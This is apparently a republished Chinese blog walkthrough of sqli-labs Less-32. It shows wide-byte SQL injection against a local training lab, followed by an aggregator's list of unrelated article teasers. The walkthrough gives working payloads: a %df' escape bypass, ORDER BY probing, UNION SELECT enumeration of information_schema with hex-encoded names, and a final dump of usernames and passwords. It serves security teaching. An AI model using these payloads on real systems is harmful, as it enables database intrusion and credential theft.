sql_lab之sqli中的宽字节注入（less32）

sql_lab之sqli中的宽字节注入（less32）

news/2024/9/25 4:37:04/文章来源:https://blog.csdn.net/qq_59020256/article/details/135164872

宽字节注入（less-32）

1.判断注入类型

http://127.0.0.3/less-32/?id=1

http://127.0.0.3/less-32/?id=1'

出现 \’ 则证明是宽字节注入

2.构成闭环

http://127.0.0.3/less-32/?id=1%df' -- s

显示登录成功则构成闭环

3.查询字段数

http://127.0.0.3/less-32/?id=1%df' order by 4 -- s

http://127.0.0.3/less-32/?id=1%df' order by 3 -- s

说明字段数为3

4.用union联合查询判断回显点

http://127.0.0.3/less-32/?id=-1%df' union select 1,2,3 -- s 记住前面要加 - 因为不加 - 则会正常查询第一个数不会执行联合查询

5.查询数据库名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),3 -- s

6.查询表名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 -- s

爆出security里面的table表

7.查询字段名

http://127.0.0.3/less-32/?id=-1%df' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 -- s

8.查username和password

http://127.0.0.3/less-32/?id=-1%df' union select 1,group_concat(username),group_concat(password) from users -- s

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/239908.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

7. 结构型模式 - 代理模式

7. 结构型模式 - 代理模式

亦称： Proxy 意图代理模式是一种结构型设计模式， 让你能够提供对象的替代品或其占位符。代理控制着对于原对象的访问， 并允许在将请求提交给对象前后进行一些处理。问题为什么要控制对于某个对象的访问呢？ 举个例子&#xff…

阅读更多...

Ubuntu 常用命令之 mkfs 命令用法介绍

Ubuntu 常用命令之 mkfs 命令用法介绍

📑Linux/Ubuntu 常用命令归类整理 mkfs 是在 Linux 和其他 Unix-like 系统中用于创建文件系统的命令。在 Ubuntu 系统中，mkfs 命令也是用于创建文件系统的。mkfs 是一个包装器，它会根据用户指定的文件系统类型调用相应的程序。 mkfs 命令的…

阅读更多...

Guava的TypeToken在泛型编程中的应用

Guava的TypeToken在泛型编程中的应用

第1章：引言在Java世界里，泛型是个相当棒的概念，能让代码更加灵活和类型安全。但是，泛型也带来了一些挑战，特别是当涉及到类型擦除时。这就是TypeToken大显身手的时候！ 作为Java程序员的咱们，…

阅读更多...

【ITK库学习】使用itk库进行图像配准：内插器（插值）

【ITK库学习】使用itk库进行图像配准：内插器（插值）

目录 1、itkNearestNeighborInterpolateImageFunction 最近点插值2、itkLinearInterpolateImageFunction 线性插值3、itkBSplineInterpolateImageFunction B样条插值4、itkWindowedSincInterpolateImageFunction 窗口化Sinc插值5、itkRayCastInterpolateImageFunction 投射插值…

阅读更多...

Mac OS 13+,Apple Silicon,删除OBS虚拟摄像头(virtual camera),

Mac OS 13+,Apple Silicon,删除OBS虚拟摄像头(virtual camera),

原文链接: https://www.reddit.com/r/MacOS/comments/142cv OBS为了捕获摄像头视频,将虚拟摄像头插件内置为系统插件了.如下直接删除没有权限的,要删除他,在mac os 13以后,需要关闭先关闭苹果系统的完整性保护(SIP) Apple 芯片(M1,....)的恢复模式分为两种,回退恢复模式,和…

阅读更多...

MySQL数据库视图

MySQL数据库视图

目录视图概述语法检查选项视图的更新视图作用案例视图概述视图(View)是一种虚拟存在的表。视图中的数据并不在数据库中实际存在，行和列数据来自定义视图的查询中使用的表，并且是在使用视图时动态生成的。通俗的讲，视图只保存…

阅读更多...

K8S 日志方案

K8S 日志方案

目录一、统一日志管理的整体方案 1、基础日志 2、Node级别的日志 3、集群级别的日志架构二、安装统一日志管理组件 1、部署Elasticsearch 2、部署Fluentd 3、部署Kibana 三、日志数据展示一、统一日志管理的整体方案通过应用和系统日志可以了解Kubernetes集群内…

阅读更多...

【EasyExcel实践】万能导出，一个接口导出多张表以及任意字段（可指定字段顺序）-简化升级版

【EasyExcel实践】万能导出，一个接口导出多张表以及任意字段（可指定字段顺序）-简化升级版

文章目录前言正文一、项目简介二、核心代码2.1 pom.xml 依赖配置2.2 ExcelHeadMapFactory2.3 ExcelDataLinkedHashMap2.4 自定义注解 ExcelExportBean2.5 自定义注解 ExcelColumnTitle2.6 建造器接口 Builder2.7 表格工具类 ExcelUtils2.8 GsonUtil2.9 模版类 ExportDynamicCo…

阅读更多...

概率中的50个具有挑战性的问题[02/50]：连续获胜

概率中的50个具有挑战性的问题[02/50]：连续获胜

一、说明我最近对与概率有关的问题产生了兴趣。我偶然读到了弗雷德里克莫斯特勒（Frederick Mosteller）的《概率论中的五十个具有挑战性的问题与解决方案》（Fifty Challenge Problems in Probability with Solutions）一书。我认为…

阅读更多...

HarmonyOS构建第一个ArkTS应用（FA模型）

HarmonyOS构建第一个ArkTS应用（FA模型）

构建第一个ArkTS应用（FA模型） 创建ArkTS工程若首次打开DevEco Studio，请点击Create Project创建工程。如果已经打开了一个工程，请在菜单栏选择File > New > Create Project来创建一个新工程。选择Application应用开发&a…

阅读更多...

十三、W5100S/W5500+RP2040之MicroPython开发＜MQTT新版OneNET示例＞

十三、W5100S/W5500+RP2040之MicroPython开发＜MQTT新版OneNET示例＞

文章目录 1. 前言2. 平台操作流程3. WIZnet以太网芯片4. 示例讲解以及使用4.1 程序流程图4.2 测试准备4.3 连接方式4.4 相关代码4.5 烧录验证 5. 注意事项6. 相关链接 1. 前言在这个智能硬件和物联网时代，MicroPython和树莓派PICO正以其独特的优势引领着嵌入式开发…

阅读更多...

【SpringBoot】之Security集成使用（入门级）

【SpringBoot】之Security集成使用（入门级）

🎉🎉欢迎来到我的CSDN主页！🎉🎉 🏅我是君易--鑨，一个在CSDN分享笔记的博主。📚📚 🌟推荐给大家我的博客专栏《SpringBoot开发之Security系列》。&#x1f3af…

阅读更多...

【SpringBoot】之Security进阶使用

【SpringBoot】之Security进阶使用

🎉🎉欢迎来到我的CSDN主页！🎉🎉 🏅我是君易--鑨，一个在CSDN分享笔记的博主。📚📚 🌟推荐给大家我的博客专栏《SpringBoot开发之Security系列》。&#x1f3af…

阅读更多...

k8s启动docker容器Error: Could not find or load main class ${start-class}报错

k8s启动docker容器Error: Could not find or load main class ${start-class}报错

前行提要： 今天部署采集点服务（docker项目）发现报这个错误。提出假设： 1，配置文件错误（工程需要配置的东西比较多） 之后开始一一排查，发现配置有问题，但是不是这个错误…

阅读更多...

modbus_tcp的实现 through python.

modbus_tcp的实现 through python.

0.引言当前科技似乎处于加速发展期，各个模块都在快速迭代，迭代的速度会让既有的一些经验产生问题，在用python实现modbus_tcp协议时，网上流传的一些代码中import语句会出现问题。导致pymodbus模块用起来很不好用。这个原因出在…

阅读更多...

【ps】常见工具说明

【ps】常见工具说明

1：污点修复工具》内容识别去除脸部珍珠》创建纹理 2：修复画笔工具按住ALT选择一处你想移动的地方 3：修补工具》内容识别选择一个区域将区域内的东西移动到另一处皮肤上

阅读更多...

C语言之字符串

C语言之字符串

目录字符串字面量编辑字符串字面量的长度 ◆具有静态生命周期 ◆对于同一个字符串字面量的处理方式依赖于编译器字符串字符数组的初始化赋值空字符串字符串的读取在前面的学习中就会发现，仅仅能用一个字符表示的事物少之又少，对于地…

阅读更多...

日志服务 SLS 深度解析：拥抱云原生和 AI，基于 SLS 的可观测分析创新

日志服务 SLS 深度解析：拥抱云原生和 AI，基于 SLS 的可观测分析创新

云布道师 10 月 31 日，杭州云栖大会上，日志服务 SLS 研发负责人简志和产品经理孟威等人发表了《日志服务 SLS 深度解析：拥抱云原生和 AI，基于 SLS 的可观测分析创新》的主题演讲，对阿里云日志服务 SLS 产品服务创新以…

阅读更多...

2023/12/21作业

2023/12/21作业

思维导图代码 .text .global _start _start: 灯1 gpio时钟使能 [4]->1 0x5000A28 LDR R0,0x50000A28 指定寄存器地址 LDR R1,[R0]将寄存器取出放到R1 ORR R1,R1,#(0x1<<4)将第四位设置为1 STR R1,[R0]读取R0寄存器到R1 PE…

阅读更多...

Ubuntu 常用命令之 reboot 命令用法介绍

Ubuntu 常用命令之 reboot 命令用法介绍

📑Linux/Ubuntu 常用命令归类整理 reboot命令在Ubuntu系统中用于重新启动系统。这个命令通常需要管理员权限才能执行。 reboot命令的参数如下 -f 或 --force：强制重启，不调用shutdown -r进行友好重启。-p 或 --poweroff：在重启…

阅读更多...

推荐文章

最新文章